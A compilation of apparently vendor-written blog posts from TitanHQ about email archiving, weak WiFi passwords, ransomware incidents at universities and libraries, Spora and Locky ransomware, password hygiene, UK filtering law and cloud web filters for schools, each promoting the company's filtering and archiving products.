If any emails ever need to be accessed, it is essential that any email archive or backup can be searched. In the case of standard backups, that is likely to be an incredibly time consuming process. Backups are not designed to be searched. Finding the right backup alone can be almost impossible, let along finding all emails sent to, or received from, a specific company or individual. Backups have their uses, but are not suitable for businesses for email retention purposes.
For that, an email archive is required. Email archives contain structured email data that can easily be searched. If ever an eDiscovery order is received, finding all email correspondence is a quick and easy task. Since many email archives are cloud based, they also do not require huge storage resources. Emails are stored in the cloud, with the space provided by the service provider.
ArcTitan: TitanHQ’s Cost Effective and Convenient Email Archiving Solution
ArcTitan is a cost-effective, fast and easy-to-manage email archiving solution provided by TitanHQ that meets the needs of all businesses and enables them to comply with all email retention laws in the United States.
ArcTitan incorporates a range of security protections to ensure stored data is kept 100% secure and confidential, with email data encrypted in transit and storage. In contrast to many email archiving solutions, ArcTitan is fast. The solution can process 200 emails per second from your email server and archived emails can be retrieved instantly via a browser or Outlook (using a plugin). Emails can be archived from any location, whether in the office or on the go via a laptop or tablet. There are no limits on storage space or the number of users. The solution can be scaled up to meet the needs of businesses of all sizes.
To find out more about ArcTitan and how it can benefit your business, contact the TitanHQ team today and kiss goodbye to all your email storage headaches.
The hacking of WiFi networks can be highly lucrative for cybercriminals. If WiFi passwords are obtained by hackers, malware can be installed and every user who connects to that network faces a higher risk of having their device and sensitive information stolen.
Strong passwords should be set on Wi-Fi networks to make it harder for cybercriminals to guess the passwords. However, a ISP in the United States recently encouraged its customers to make their Wi-Fi passwords less secure, suggesting they change them to show support for their Super Bowl team.
Charter Spectrum – the second largest ISP in the United States – sent the following tweet to its customers on January 23, 2017 – “Change your WiFi password and show guests where your loyalty lies! #ThatsMyTeam”.
With the Super Bowl fast approaching, the idea was for businesses to show their support for either the New England Patriots or the Atlanta Falcons. By changing their Wi-Fi passwords to GO_ATLANTA or GO_NEWENGLAND they would be telling their customers that they fully supported their local team. It is clear what the intention of the ISP was, although suggesting an easy password for a Wi-Fi network and then tweeting it to customers and followers of the #ThatsMyTeam hashtag was a monumentally bad idea.
It is possible that the ISP was trying to suggest that businesses change the name of their WiFi network temporarily. That would not pose any cybersecurity risk, although that is not what the tweet said. The ISP was widely criticized for the tweet on social media sites and the tweet has since been deleted.
Making a WiFi password less secure makes it easier for hackers to conduct man in the middle attacks. These attacks are where an attacker intercepts and alters communications between two parties – In this case a person who connects to the WiFi network and the website which they wish to communicate – Their bank or an online store for instance. Email conversations can also be hijacked and communications intercepted. Hackers can eavesdrop on conversations and gather information that can be used in future spear phishing campaigns or highly sensitive login credentials to work networks or secure accounts can be gained.
We advise always setting a strong, secure password on Wi-Fi networks and changing that password regularly to prevent cybercriminals from taking advantage. As an additional cybersecurity protection for Wi-Fi network users, a web filter should be used.
By installing WebTitan on your WiFi network, it is possible to control the websites that customers can access. Websites containing exploit kits that silently download malware onto users’ devices can be blocked. A web filter can also be used to prevent users from visiting inappropriate websites that could cause offense to other patrons or harm to minors – pornographic websites for instance. By exercising just a little control over accessible content, a WiiFi network can be made safe and secure for all users.
Following a massive increase in ransomware attacks, security experts have called for ransomware protection for universities to be augmented
Ransomware: A Major Threat to Universities the World Over
Ransomware has become one of the biggest data security threats. The healthcare industry has been extensively targeted, as have the financial services, manufacturing, telecoms, and just about every other industry sector. Now, attacks are being conducted on higher education establishments with increased vigor.
Universities are attractive targets. They store vast quantities of data. Researchers, teaching staff, and students alike need access to data on a daily basis. Without access, all work grinds to a halt. That means ransom demands are likely to be paid.
Secondly, universities use thousands of computers and have tens of thousands of users. Cybersecurity defenses may be good, but with so many individuals with access to Internet facing computers, protecting against targeted attacks on those individuals is a major challenge. Staff and students are being actively targeted as they are the weak links in the security chain.
Then there is the issue of academic freedom. While many industries have implemented web filtering solutions to limit the websites that can be visited by staff and students, many universities have been reluctant to restrict Internet access.
In a similar vein, university networks tend to be more open than in the business world for example. Businesses tend to severely restrict access to networks. If an attack occurs, the damage is very limited. Open networks tend to result in huge numbers of files and devices being encrypted if an attacker breaks through the security perimeter.
Ransomware Protection for Universities Clearly Lacking
The number of university ransomware attacks that have been reported by institutions in the United States and Canada in 2016 has reached alarming levels. Many of those universities have been forced to pay the ransom demands to restore access to files.
Last year, the University of Calgary was forced to pay $16,000 to restore access after a ransomware attack. Carleton University was also attacked with ransomware, as was Los Angeles Valley College. According to a Newsweek report in August last year, two thirds of British universities had been attacked with ransomware. Queen’s University in Belfast, Northern Ireland, was one of those attacked. A ransom had to be paid to recover data. One university in the United Kingdom – Bournemouth University – experienced 21 ransomware attacks in the space of 12 months. The list goes on and on.
Malware is also a problem. The University of Alberta discovered a malware infection on 304 computers. A keylogger had been installed which recorded details of all information entered on infected computers, including login details.
It is unsurprising given the extent to which universities are being attacked that there have been numerous calls for ransomware protection for universities to be improved. But how can ransomware protection for universities actually be improved without causing major disruption to staff and students or overly restricting data access?
How Can Ransomware Protection for Universities be Improved?
Universities, like all organizations, must develop a strategy to prevent ransomware attacks and deal with them when they occur. Protections need to be improved to prevent attacks, technology needs to be employed to detect ransomware infections quickly, and policies and procedures must be developed so rapid action can be taken when attacks occur. Rapid action can greatly reduce the harm caused.
No university wants to overly restrict Internet access, but the use of a web filter is strongly recommended. Rather than blocking access to valuable information, an advanced web filtering solution such as WebTitan can be applied to restrict access to malicious websites and to block malware downloads. WebTitan has highly granular controls which allow restrictions to be put in place to prevent ransomware infections, without overblocking website content. Furthermore, Internet access controls can be easily set for different user groups.
At the very least, universities should apply web filtering controls to prevent the accessing of websites that are known to contain malware and should not rely on their anti-virus solution to provide this service.
It is also essential for controls to be applied to the email system to block emails containing malicious links and attachments. SpamTitan blocks 99.97% of spam emails and 100% of known malware using two anti-virus engines for extra protection. SpamTitan not only blocks incoming spam, but also performs scans of outgoing mail to prevent the spread of infections between end users.
Antivirus and anti-malware solutions should also be used and updated automatically. Intrusion detection systems should also be considered to ensure that infections are rapidly identified.
Good patch management policies are also essential to ensure vulnerabilities are not allowed to persist. Applying patches and software updates promptly reduces the risk of vulnerabilities being exploited.
Even with technologies in place, staff and students should be educated about the risk of cyberattacks, phishing, malware and ransomware. Best practices should be distributed via email to all staff and students along with information about any specific cyberthreats.
Unfortunately, unless ransomware protection for universities is greatly improved, the attacks are likely to continue. Cybercriminals view higher education institutions as soft and potentially highly lucrative targets. It is up to universities to take appropriate action to prevent malware and ransomware attacks.
Poor cybersecurity practices exist at many US organizations, which are allowing hackers and other cybercriminals to gain access to corporate networks, steal data, and install malware and ransomware. Businesses can implement highly sophisticated cybersecurity defenses, but even multi-million-dollar cybersecurity protections can be easily bypassed if poor cybersecurity practices persist.
This month we have seen two reports issued that have highlighted one of the biggest flaws in cybersecurity defenses in US enterprises. Poor password hygiene.
The purpose of passwords is to prevent unauthorized access to sensitive data, yet time and again we have seen data breaches occur because of end users’ poor choice of passwords and bad password practices.
Earlier this month, SplashData released its annual report on the worst passwords of 2016. The report details the top 25 poorly chosen passwords. This year’s report showed that little had changed year on year. Americans are still very bad at choosing strong passwords.
Top of this year’s list of the worst passwords of 2016 were two absolute howlers: 123456 and password. Number three and four were no better – 12345 and 12345678. Even number 25 on the list – password1 – would likely only delay a hacker by a few seconds.
Another study also highlighted the extent to which Americans practice poor password hygiene. Pew Research asked 1,040 US adults about their password practices. 39% of respondents said they used the same passwords – or very similar passwords – for multiple online accounts, while 25% admitted to using very simple passwords because they were easier to remember. 56% of 18-29-year-old respondents said that they shared their passwords with other individuals, while 41% of all respondents said they shared passwords with family members.
The results of this survey were supported by later research conducted by Telsign, who found a very blasé attitude to online security among U.S. citizens. Although 80% of respondents admitted to being concerned about online security (and half of those claimed to have had an online account hacked in the past year), 73% of respondents´ online accounts are guarded by duplicate passwords and 54% of respondents use five or fewer passwords across their entire online life.
While the Pew Research and Telsign surveys did not specifically apply to businesses, these poor password practices are regrettably all too common. Passwords used for corporate accounts are recycled and used for personal accounts, and poor password choices for company email accounts and even network access are common. Although two factor authentication is not a solution to the problem of poor personal cybersecurity practices, only 38% of U.S. companies use it to protect their networks from poor corporate cybersecurity practices.
Poor Cybersecurity Practices That Leave Organizations Open to Cyberattacks
Unfortunately, poor cybersecurity practices persist in many organizations. IT departments concentrate on implementing sophisticated multi-layered defenses to protect their networks and data from hackers, yet are guilty of failing to address some of the most basic cybersecurity protections.
The failure to address the following poor cybersecurity practices at your organization will leave the door wide open, and hackers are likely to be quick to take advantage.
More than 4,100 data breaches of more than 500 records were reported by organizations in the United States in 2016*. Many of those data breaches could have been avoided if organizations had eradicated their poor cybersecurity practices.
Some of the main cybersecurity mistakes made by US companies include:
- Not conducting a comprehensive, organization-wide risk assessment at least every 12 months
- The failure to enforce the use of strong passwords
- Not providing employees with a password manager to help them remember complex passwords
- The continued use of unsupported operating systems such as Windows XP
- Failure to apply patches and updates promptly
- Not restricting the use of administrator accounts
- Failure to adequately monitor devices for shadow IT
- Failure to block macros from running automatically
- Giving employees unnecessary access to data systems and networks
- Not providing employees with cybersecurity awareness training
- Not instructing employees on the safe handling of personally identifiable information
- Failure to conduct anti-phishing simulation exercises
- Failure to notify new employees and vendors of IT security policies and procedures before data access is provided
- Not revising and updating IT security policies and procedures at least every six months
- Failure to change default logins on networked devices
- Failure to encrypt data on portable storage devices
- Allowing employees full, unfettered access to the Internet
- Failure to implement a spam filter to block malicious email messages
- Failure to monitor applications with access to data
- Failure to create appropriate access controls
- Failure to monitor the activity of employees
*2016 Data Breach Report from Risk Based Security
Internet filtering laws in the UK could soon be updated to allow Internet Service Providers (ISPs) to legally block explicit website content.
Former UK Prime Minister David Cameron announced in 2013 that his – and his party’s – aim was to implement greater controls over the Internet and to start blocking pornography by default. In the summer of 2013, pornography filters were put in place by most Internet Service Providers in the UK. Major ISPs in the UK now require customers to opt-in if they wanted to use their computers to view online pornography. However, unless requested, pornography filters are applied.
However, last year, as part of a new EU ruling covering mobile phone roaming charges, the porn filter in the UK was determined to be illegal. The EU ruled that companies are not permitted to block access to legal website content, only website content that is illegal in member states.
The UK opted out of the law after it was passed last year, allowing ISPs to continue to block Internet porn without violating the EU’s ‘Net Neutrality’ laws. However, even though the UK voted out, ISPs were only ever requested to implement porn filters. Internet filtering laws in the UK have never been introduced.
The Digital Economy Bill – which has already been passed by the House of Commons – has had a number of amendments added this week, one of which covers the use of Internet filters. If the Bill is written into law, this will be the first legislation in the UK covering the use of Internet filters.
The new clause is as follows: “A provider of an internet access service to an end-user may prevent or restrict access on the service to information, content, applications or services, for child protection or other purposes, if the action is in accordance with the terms on which the end-user uses the service.”
The UK’s House of Lords will now subject the bill, and the proposed amendments, to close scrutiny next week, examining the Bill line by line. While it is possible that some of the controversial elements of the Bill will be dropped, it is now looking likely that Internet filtering laws in the UK will be introduced.
The Bill also requires ISPs in the UK to block websites containing pornography that do not have any age verification mechanism in place. According to Department of media, culture, and sport parliamentary under-secretary of state Lord Ashton, ISPs will be required to block these websites, with the legislation enforced by the British Board of Film Classification.
While the UK has voted to leave the EU following the ‘Brexit’ vote, until the UK actually leaves the European Union it is required to comply with EU laws. Currently there is some confusion over whether the blocking of pornography by default in the UK contravenes EU laws.
While there is some doubt over the matter, the UK’s communications regulator – OFCOM – has not instructed ISPs to lift the block and require customers to opt in if they want to restrict access to pornography.
A spokesperson for the Department of media, culture, and sport said “We are committed to keeping children safe from harmful pornographic content on the internet and this amendment will give internet service providers reassurance the family friendly filters they currently offer are compliant with EU law.”
There is an important reason why the use of web filters in libraries is increasing. The cost of providing computers with Internet access to patrons is not inconsiderable, yet in order to qualify for discounts under the E-Rate program, libraries must implement a web filter to comply with CIPA regulations. Libraries must use the web filter to block obscene images (pornography), images of child abuse, and any other graphics that could cause minors to come to harm.
However, there is another reason why the use of web filters in libraries is important. This has been clearly demonstrated this week in St. Louis, MO.
Web Filters in Libraries are Not Only About Internet Control
This week, every computer in the St. Louis Public Library System was taken out of action. Visitors were still able to visit the library and use the books, but do little else. All book borrowing stopped since it is not possible to for library staff to log borrowing on the checkout system. Patrons have also been prevented from gaining access to the Internet. Even the email system has been locked and taken out of action.
What kind of computer malfunction causes the entire network of computers to stop working? The answer is ransomware.
Ransomware is malicious software that has been developed with one sole purpose: To encrypt system and data files to prevent access. Once downloaded, ransomware locks files with powerful encryption preventing files from being accessed. The attacker then sends a ransom demand offering the unique keys to decrypt files in exchange for payment.
Typically, attackers demand $500 in an anonymous currency such as Bitcoin to unlock each computer that has been attacked. In the case of the St. Louis Public Library system, the ransom demand was $35,000. All 700 of the library systems’ computers – across 16 locations – were attacked and encrypted.
Some ransomware variants also act as information stealers. Fortunately for the library, its inventory was unaffected and payment card information and other personal information of patrons were not stolen.
The St. Louis Public Library system will not be paying the extortionate ransom demand. It has instead opted for the only alternative in cases of ransomware infections. To wipe its entire system and reinstall files from backups. That is not a quick process. It could take weeks; certainly days.
The ransom payment may be avoided, but removing the infection will still result in considerable costs being incurred. Then there is the impact the attack has had on patrons of the city’s libraries. The library system is primarily used by poor and disadvantaged individuals. According to library spokesperson Jen Hatton, “For many of our patrons, we’re their only access to the internet.” Hatton also said, “This is their only access to a computer. Some of them have a smartphone, but they don’t have a data plan. They come in and use the Wi-Fi.”
It is not clear how the infection occurred, although there are two main ways that ransomware is installed: Malicious spam email messages and by visiting malicious websites. Both of these attack vectors can be blocked if appropriate software is installed.
Web Filters in Libraries are an Important Ransomware Defense
A spam filter can be used to filter out malicious messages. Those messages contain attachments, which if opened, infect computers or download ransomware. User interaction is required. If the messages are quarantined and not delivered to users’ inboxes, infection can be prevented.
The use of web filters in libraries is therefore not just about limiting access to inappropriate and harmful website content. Web filters in libraries are an important cybersecurity protection that can help to ensure that, come what may, patrons will still be able to access the Internet and borrow books.
If you use a computer, you are at risk of having your device infected with malware; however, listed below are some useful tips for preventing malware infections.
Unfortunately, signature-based anti-malware software is far less effective at preventing infections than in years gone by. Malware developers are now using a wide range of strategies and techniques to prevent traditional anti-malware solutions from detecting and blocking infections.
Rely on anti-malware or anti-virus software alone and sooner or later you may find your device has been compromised, your keystrokes are being logged, and your – or your organization’s – data are being stolen.
However, there are some straightforward strategies that you can adopt to prevent malware infections and keep your computer, and your network, malware-free.
10 Tips for Preventing Malware Infections
Backup Your data
OK, a data backup will not prevent a malware infection, but it can help you recover if your computer is infected with ransomware or if your data are corrupted as a result of an infection – or removal of malware. The only way to recover from some infections is to wipe out your system and restore it from a previously known safe point. You must therefore have a safe point that you can use. Nightly backups should be performed. You only then stand to lose 24 hours of data at most.
Keep your malware definitions up to date
Anti-malware software may not be as effective as it once was, but you do need to give it a fighting chance. If you do not keep your definitions 100% up to date you are asking for trouble. This may sound obvious, but many organizations delay updating malware definitions for forget to set software to update automatically on all devices.
Never click on links or open email attachments from unknown senders
Cybercriminals target employees as it is far easier to gain access to a corporate network if an employee bypasses their organization’s defences and installs malware. All it takes is for one employee to install malware for attackers to gain a foothold in a network. Ensure that all employees receive anti-phishing training and have at least basic IT security skills. Most data breaches start with a phishing email.
Ensure operating systems and software are patched promptly
Operating systems, firmware, and all software must be kept up to date. As soon as patches are released, cybercriminals will be reverse engineering them to uncover the vulnerabilities. Don’t delay applying patches. Good patch management policies are essential for preventing malware infections.
Watch out for shadow IT
Downloading pirated software is an excellent way to infect computers with malware. Pirated software is often bundled with malware, spyware, and all manner of nasties. Block the running of executables and keygens if practical. Only install software from trusted sources. As an additional check, before installing software, check the software provider’s MD5 hash against your copy. If it’s a match, install. If not, delete.
Take care with USB drives
Not all malware comes via the web or email. USB drives can easily introduce malware. Make sure your anti-malware solution is configured to automatically scan USB drives before granting system access and never plug in a drive from an unknown source.
Perform regular malware scans
Having anti-virus and anti-malware software will not necessarily mean your system is protected. Full system scans should still be performed. Some infections can slip under the radar. A full scan should be performed at least once a month.
Keep abreast of the latest malware trends
You may have limited time, but it is important to keep abreast of the latest attack trends, cyberattacks, data breaches, and threat reports. Check the warnings from US-CERT, and monitor websites such as DarkReading, CIO, CISO, and The Register. A little research goes a very long way.
Keep mobile devices protected
Mobiles can easily be used to introduce malware onto networks to which they connect. Mobiles are often used on unprotected Wi-Fi hotspots, and the devices are increasingly being targeted by hackers. Ensure security software is installed on mobile devices and security settings on phones are active.
Use a firewall, web, and Wi-Fi filtering
A firewall is essential tool for preventing malware infections, although businesses should consider purchasing a next generation firewall device. Next generation firewalls combine a traditional firewall with other network device filtering functionalities. Web and Wi-Fi filtering solutions are also important. By filtering the Internet, it is possible to prevent drive-by malware downloads and carefully control the risks that employees take.
There is now a new and particularly dangerous ransomware threat to deal with. Spora ransomware could well be the new Locky.
Locky and Samas ransomware have proved to be major headaches for IT departments. Both forms of ransomware have a host of innovative features designed to avoid detection, increase infections, and inflict maximum damage, leaving businesses with little alternative but pay the ransom demand.
However, there is now a new ransomware threat to deal with, and it could well be even bigger than Locky and Samas. Fortunately, the ransomware authors only appear to be targeting Russian users, but that is likely to change. While a Russian version has been used in attacks so far, an English language version has now been developed. Spora ransomware attacks will soon be a global problem.
A considerable amount of time and effort has gone into producing this particularly dangerous new ransomware variant and a decryptor is unlikely to be developed due to the way that the ransomware encrypts data.
In contrast to many new ransomware threats that rely on a Command and Control server to receive instructions, Spora ransomware is capable of encrypting files even if the user is offline. Shutting down Internet access will not prevent an infection. It is also not possible to block access to the C&C server to stop infection.
Ransomware variants have previously been developed that can encrypt without C&C communication, although unique decryption keys are not required. That means one key will unlock all infections. Spora ransomware on the other hand requires all victims to use a unique key to unlock the encryption. A hard-coded RSA public key is used to generate a unique AES key for every user. That process occurs locally. The AES key is then used to encrypt the private key from a public/private RSA key pair generated for each victim, without C&C communications. The RSA key also encrypts the unique AES keys for each user. Without the key supplied by the attackers, it will not be possible to unlock the encryption.
This complex encryption process is only part of what makes Spora ransomware unique. In contrast to many other ransomware variants, the attackers have not set the ransom amount. This gives the attackers a degree of flexibility and importantly this process occurs automatically. Security researchers believe the degree of automation will see the ransomware offered on an affiliate model.
The flexibility allows businesses to be charged a different amount to an individual. The ransom set based on the extent of the infection and types of files that have been encrypted. Since Spora ransomware collects data on the user, when contact is made to pay the ransom, amounts could easily be adjusted.
When victims visit the attacker’s payment portal to pay the ransom, they must supply the key file that is created by the ransomware. The key files contains a range of data on the user, including details of the campaign used. The attackers can therefore carefully monitor infections and campaigns. Those campaigns that are effective and result in more payments can then be repeated. Less effective campaigns can be dropped.
Currently there are multiple payment options, including something quite different. Victims can pay to unlock the encryption, or pay extra to prevent future attacks, essentially being granted immunity.
Emisoft researchers who have analyzed Spora ransomware say it is far from a run of the mill variant that has been quickly thrown together. It is the work of a highly professional gang. The encryption process contains no flaws – uncommon for a new ransomware variant – the design of the HTML ransom demand and the payment portal is highly professional, and the payment portal also contains a chat option to allow communication with the attackers. This degree of professionalism only comes from extensive investment and considerable work. This threat is unlikely to go away soon. In fact, it could prove to be one of the biggest threats in 2017 and beyond.
Cybercriminals have embraced ransomware and have been increasingly targeting businesses, yet many business leaders are unsure how to prevent ransomware attacks. Consequently, the risk from ransomware is not being effectively managed, and that may prove costly.
Ransomware is a form of malware that is capable of encrypting files on local machines, network drives, and servers. Any computer that is connected to the Internet can potentially be infected. Even without internet access, files may be encrypted if a computer is networked. The latest ransomware variants are capable of spreading laterally within a network and encrypting the data on hundreds of devices.
Files required for critical business processes may be encrypted and made inaccessible. A successful attack can result in a company’s operations grinding to a halt. A healthcare ransomware attack can result in patients’ health information becoming inaccessible. An attack on a pharmaceutical company may result in files necessary for drug manufacture being locked, which could affect the quality of products. Lawyers offices may lose essential client information. Few businesses could continue to operate at their full potential during a ransomware attack.
The loss of files can prove extremely expensive, far less than the cost of any ransom payment. Many companies therefore are left with little alternative but to pay the ransom demand. Ransom payments are actually made surprisingly frequently. According to a recent study conducted by IBM, 70% of businesses that experienced a ransomware infection ended up paying the attackers to supply the keys to unlock their data. Half of those businesses paid more than $20,000 while 20% paid more than $40,000.
Even when the ransom is paid there is no guarantee that a viable key will be supplied to unlock the encryption. Files may therefore be lost forever. One healthcare organization in the United States recently discovered that files can all too easily be lost forever. Three months after ransomware was installed on one of its servers and critical patient health information was encrypted, Desert Care Family and Sports Medicine has still not been able to unlock the encryption nor access its patients’ data.
It is essential to learn how to prevent ransomware attacks and to implement appropriate defenses not only to stop attackers from installing ransomware, but to ensure a system is put in place that will allow data to be recovered without having to resort to paying a ransom.
Recovering from a ransomware attack can be extremely expensive. Ransom payments can be extortionate. Business can be lost while systems are taken out of action. Even applying keys that have been supplied by attackers can be long winded. Each encrypted device has its own key, and those keys must be applied very carefully. A forensic analysis is also important after a ransomware attack to search for backdoors that may have added, as well as to determine if data have been stolen. Additional protections then need to be put in place to prevent future attacks from occurring.
How to Prevent Ransomware Attacks
The first and most important step to take will not prevent ransomware attacks, but it will help you to recover from a ransomware attack promptly without having to resort to paying the ransom. Recovery will depend on you having a viable backup of your data. Total file recovery may not be possible, but it should be possible to recover the vast majority of your files.
For that to be possible, you must ensure that all files on all devices and network drives are backed up. That includes all removable drives such as flash drives. Backup files must be stored on a non-networked drive, in the cloud, or ideally on an air-gapped device – One that is unplugged as soon as the backup is performed. Multiple backups should ideally be made with one copy stored in the cloud and one on a detachable storage device. You should always store backups in multiple files. If one becomes corrupted, you will not lose all of your data.
- Avoid the use of administrator accounts with extensive privileges as far as is possible. If an administrator account is required, use it and then change to a guest account with limited privileges. This will reduce the damage caused if the user’s machine is infected.
- Ensure that all software is kept up to date and your organization employs good patch management practices. In particular, ensure browser and plugin updates are applied promptly. Vulnerabilities can all too easily be exploited and used to download ransomware.
- If plugins are not required, remove them. Adobe Flash in particular, but also Java and Silverlight. If required, they should require activating individually as and when needed.
- Ensure employees’ computers are configured to show file extensions. If full file extensions are displayed, it is easier to identify potentially malicious files with double extensions.
- Ensure macros are disabled on all devices. At the very least, ensure macros do not run automatically.
- Disable Remote Desktop Protocol (RDP) on all devices unless it is absolutely essential.
- A web filter can be used to prevent end users from visiting malicious websites where ransomware can be downloaded. A web filter can also block malicious third party adverts (malversting).
- End users should be instructed never to open files from unknown senders or to click on links contained in emails unless 100% sure that the links are genuine.
- The use of a spam filter is strongly advisable. The spam filter should be configured to aggressively block threats. Executable file attachments should also be automatically quarantined.
In the past few days, Facebook Messenger Locky ransomware attacks have been discovered, exploit activity has increased, and malicious spam email volume has increased. Organizations now need to defense against a wide range of attack vectors
2016 – The Year of Ransomware
2016 has seen an explosion in the use of ransomware by cybercriminals and there is no sign of that changing in the near future. More than 200 ransomware families have now been identified, one of the most dangerous being Locky.
Locky ransomware was first discovered in February this year, but it has fast become one of the most prolific ransomware variants and has infected thousands of computers. No organization is immune to attack, although the gang behind the infections have been extensively targeting healthcare organizations. A number of U.S. healthcare providers have been forced to pay a ransom demand to recover their data.
Rather than cybercriminals having to break through company defenses to gain access to data, then exfiltrate files, and sell those data on the black market – a process that can take weeks before payment is received – ransomware is a quick and easy revenue generator. Payments are made within a few days of infection as many companies cannot continue to function without access to their data.
It is not even necessary for cybercriminals to develop their own ransomware. The malicious file-encrypting software can be ‘hired’ from the authors. By using ransomware-as-a-service, anyone with an Internet connection could run a ransomware campaign. Little skill is needed and attacks result in fast payment. It is therefore no surprise that the file-encrypting software has become so popular.
Infection can occur via malicious adverts, exploit kits, or via spam email. All of those infection vectors allow the attackers to bypass traditional cybersecurity defenses such as firewalls.
Some headway has been made by security researchers and decryptors have been developed for some ransomware variants. Wildfire, Chimera, Shade, TeslaCrypt, and CoinVault have all been cracked. However, Locky has so far resisted security researchers’ efforts to crack it.
The authors of the crypto-ransomware are also constantly updating Locky and new variants are regularly being released. At present, there is no decryptor available for Locky infections and victims are faced with three choices if they experience an infection:
- Accept data loss
- Pay the ransom demand to obtain a key to unlock data
- Recover encrypted files from backups
Unfortunately for the victims, recovering encrypted files from backups can be complicated. Locky not only locks files with powerful encryption, the files names and file extensions are also changed. This makes it hard for victims to identify specific files. Locky also deletes Windows Shadow Copies to make it harder for victims to recover their data.
Facebook Messenger Locky Ransomware Attacks Reported
The authors behind Locky have experimented with exploit kits to spread infections, although since the demise of the Angler and Neutrino exploit kits, Locky has primarily been distributed via spam email. Massive spam email campaigns are used to spread the malicious software. Those campaigns involve many millions of emails.
However, earlier this month, security researchers noticed that the cybercriminal gang behind Locky has started to use exploit kits again. The Bizarro Sundown exploit kit has been discovered to be spreading Locky. More worrying, Facebook Messenger Locky ransomware attacks have now been reported.
The social media giant has confirmed that Facebook Messenger Locky ransomware attacks have occurred, although Facebook was quick to point out that infections are occurring via “a poorly implemented extension for Google’s Chrome browser.”
Security controls are generally very good at Facebook, but they are not infallible. Facebook Messenger Locky ransomware attacks are a major risk and users must exercise caution.
As with spam email, users should not open any attachments from individuals they do not know. Even when image files and other file types are received via messenger apps and spam email from individuals that are known to the recipient, they should be treated with suspicion.
How to Reduce the Risk of a Ransomware Infection
Businesses need to implement defenses to reduce the risk of a ransomware infection. The consequences for taking no action can be severe.
Ransomware infections can spread laterally through a network and ransomware gangs require payment for each infected machine and can even set the price per infected organization. The Locky ransomware attack on Hollywood Presbyterian Medical Center in February resulted in a ransom payment of $17,000 being made, in addition to the considerable cost associated with removing the infection and recovering from more than a week without access to key information systems.
One of the best defenses against ransomware is WebTitan. WebTitan is an innovative web filtering solution that can be configured to limit access to websites known to host exploit kits. Malicious third-party adverts (malvertising) can be blocked, along with websites that carry a high risk of being exploited by hackers to spread infections.
The best way for businesses to ensure that Facebook Messenger Locky ransomware attacks do not occur is to block Facebook Messenger entirely. With WebTitan, blocking Facebook Messenger – without blocking the Facebook website- is a quick and easy task.
By limiting the websites that can be visited by employees and blocking Facebook Messenger and other chat platforms, organizations can greatly improve their security posture and prevent ransomware from being installed.
For further information on the full range of features of WebTitan, details of pricing, and how to register for a free no-obligation trial, contact the TitanHQ sales team today.
Hardware-based web filtering appliances for schools have some advantages, but many K12 schools are saying goodbye to the appliances and are choosing a much more convenient and practical solution.
In the United States, K12 schools are required to implement a web filtering solution to control access to the Internet in order to receive E-rate funding. Even schools that do not participate in the E-rate program need to filter the Internet. Parents are pressuring schools into ensuring the Internet can be accessed safely in schools and want to receive assurances that their children can use the Internet without inadvertently – or deliberately – viewing inappropriate material such as pornography.
Hardware-Based Web Filtering Appliances for Schools
A hardware-based web filtering appliance for schools may appear to tick all the boxes. Hardware devices sit in front of an Internet gateway and filter Internet traffic. They prevent users from accessing websites that are deemed to be dangerous or inappropriate.
While hardware-based web filtering appliances for schools can seem like an easy option, many schools are finding that is far from the case. Hardware-based web filtering appliances for schools are fine if there are just a handful of computers accessing the Internet in each classroom, but hardware solutions lack scalability. When the number of devices is increased, more appliances must be purchased.
Hardware-based web filtering appliances place limitations on web traffic. When the number of devices simultaneously requiring access to the Interest increases, a bottleneck can occur. It doesn’t matter how much the Internet pipe to a school is increased with an ISP, if a 1GB web filtering appliance is used for example, that will be the limiting factor not a 5GB connection. There is likely to be latency, which can be considerable.
One solution is to use multiple hardware devices. This will increase the capacity, although more devices mean an increased maintenance burden on IT departments. Multiple devices mean schools have to find the space to house the appliances. Cooling systems may need to be augmented and more devices means higher energy bills. Hardware-based web filtering appliances for schools can prove to be very costly.
Hardware-based web filtering appliances are now being stretched further still as many schools start increasing the number of devices used by students. While one or two desktop computers used to be sufficient, many schools are now considering one-to-one computing, where each student is issued with a school laptop. However, such an increase in devices places considerable demands on hardware-based web filters and the result is considerable latency.
Then there is the problem of how to protect students when laptop computers are taken home. As we have already seen, some parents have made their schools take back the devices until adequate controls are placed on the devices to restrict Internet content. If software is installed on each laptop – in the form of a local client – the Internet can still be filtered using school hardware-based web filters. The client forwards traffic to the school’s datacenter, and traffic then passes through a web filtering appliance.
This sorts out the problem of Internet filtering, but it also puts more pressure on the datacenter. This may even require additional hardware devices to be purchased. Also, outside of normal school hours, if there are any issues with the datacenter, students will be prevented from accessing the Internet.
The latency and cost issues have spurred many K12 schools to look for an alternative to hardware-based web filtering appliances for schools. The answer has been found in the cloud.
Benefits of Cloud-Based Web Filtering Solutions for Schools
Cloud-based web filtering solutions offer a number of advantages over hardware-based web filtering appliances and solve many problems, especially as schools increase either the number of devices supplied to students or the number of devices that are allowed to connect to the network.
Cloud-based solutions require no hardware purchases and no space in the data center. This offers an initial cost saving as devices do not need to be purchased. No network deployments of client applications also means quick and easy implementation and since there is no hardware to maintain, the burden on IT departments is eased.
Any web filtering solution involves a certain degree of latency, although with cloud-based solutions this is kept to an absolute minimal level. Internet speed is not noticeably reduced and there is no latency within the datacenter itself. When students take hardware off the premises they can still be protected without data needing to be routed back to the schools’ datacenter.
Then there is the speed of reaction to web content that should be blocked. When changes need to be made to filtering rules they can be applied quickly and easily from any location without the need for IT staff to access each hardware appliance. A cloud-based control panel can be accessed from anywhere with an Internet connection and changes can be rapidly made.
Cloud-based solutions are also highly scalable. There is no limit on bandwidth or the number of users. Once a solution is deployed, it doesn’t matter how big the network gets. There is no need to upgrade hardware or purchase any more devices.
With these and many other benefits it is no surprise that so many schools are now turning to the cloud for their Internet filtering needs. The cloud is the perfect choice for K12 schools looking to keep their students – and devices – safe.
There are a number of reasons why ransomware attacks have been increasing and why the crypto-ransomware has now become one of the biggest and most worrying threats. However, the main reason is ransomware is extremely profitable.
How profitable? According to a recent security report from McAfee Labs, one single ransomware author managed to pull in an incredible $121 million in ransomware payments in the first six months of 2016. Take off the expenses incurred and the author cleared $94 million in profit.
That was just one author. There are many. There are now more than 200 different ransomware families and many more variants of each. Fortunately, developing new ransomware is a complicated business that requires considerable programming skill. Unfortunately, there are many individuals who rent ransomware to conduct campaigns and take a cut of the profits.
The explosion in use of ransomware in the past two years is a cause for concern for all Internet users, especially for business owners. Unfortunately, the ransomware crisis is unlikely to be resolved any time soon. As long as it is profitable, the attacks will continue. Vincent Weafer, VP of Intel Security’s McAfee Labs, expects the revenues from ransomware infections in 2016 will be of the order of several hundreds of millions of dollars and most likely considerably more.
